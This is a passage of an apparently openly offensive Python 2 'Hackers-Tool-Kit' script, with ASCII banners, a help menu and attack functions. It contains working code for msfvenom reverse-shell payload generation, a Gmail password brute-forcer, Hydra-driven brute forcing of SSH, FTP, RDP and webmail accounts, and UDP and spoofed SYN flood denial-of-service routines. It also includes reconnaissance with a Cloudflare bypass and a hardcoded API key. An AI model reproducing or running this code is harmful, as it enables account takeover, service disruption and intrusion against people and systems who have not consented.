░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ - ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ - ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ - ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ - ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ - ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ - ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ - ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ - ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ - ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ - ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ - ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ - ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ - ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ - ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ - ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ - ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ - ░█▓▓▓▓▓▓███████▓██▓██░ - ░██▓▓▓████████████████░░░ - ░▓▓▓▓▓███████▓█▓████████░ ░░░ - ░░░█▓█████████████████████████▓▓▓▒░░░░░░ - ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ - ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ - ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ - ░░▓█▓█▓█████████████████████████████░░ - \033[0m""".decode('utf-8') -def mainbanner11(): - print """\033[91m - ██████╗ ██████╗ ██████╗ - ██╔════╝ ██╔════╝ ██╔════╝ - ███████╗ ███████╗ ███████╗ - ██╔═══██╗██╔═══██╗██╔═══██╗ - ╚██████╔╝╚██████╔╝╚██████╔╝ - ╚═════╝ ╚═════╝ ╚═════╝ - ░░░░ ░░░░░ - ░▒███████▓▒░░ ░░░████████▓░░░ - ░▓████████████▒░░ ░░█████████████░░ - ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ - ░ ░██████▒░ ░░░░███████ ░░ - ░░███████░░ ░░██████▓░ - ░███████░░ ░▒██████▒ - ░░░░ ░░███████░░░███████▒░ ░░░ - ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ - ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ - ░▒██████████████▒████████▒██████████████░░ - ░░██████████████▒░███▒▒▒█████████████░░ - ░░░░▓████████░█░▓▓▒████████▒░░░░░ - ░░████████▓░██░████████▒░░░ - ░░▒██████░▒▒░░▒░░██████░ - ░░█████████▓░█░████▓███▓░ - ░▒█▓░▒██████▒███████░░█▓░ - ░░░███████████████████▓░░ - ░▒▓████████████████▒░ - ░░▒███████████████▓▒░ - ░▒█████▓██████░░ - ░██████████░ - @tuf_unkn0wn ░█████████▒ type ? for help - █████████░░ - ░░████████░░ - ░▓█████▓░ - ░▓████▒░ - ░░████░ - ░░░▒██░░ - ░█▓░ - ░░▓░░ - ░░░░░ - ░░ - \033[0m""".decode('utf-8') - - -def mainbanner(): - import random - for x in range(10): - num = random.randint(1,11) - if num == 1: - mainbanner1() - if num == 2: - mainbanner2() - if num == 3: - mainbanner3() - if num == 4: - mainbanner4() - if num == 5: - mainbanner5() - if num == 6: - mainbanner6() - if num == 7: - mainbanner7() - if num == 8: - mainbanner8() - if num == 9: - mainbanner9() - if num == 10: - mainbanner10() - if num == 11: - mainbanner11() -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -clear : clears screen except for banner -clearall: clears everything on screen -banner : clears screen and shows new banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -run : run a file -phpload : make a php reverse_tcp payload and start it in a multi handler -pyload : make a python reverse_tcp payload and start it in a multi handler -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / 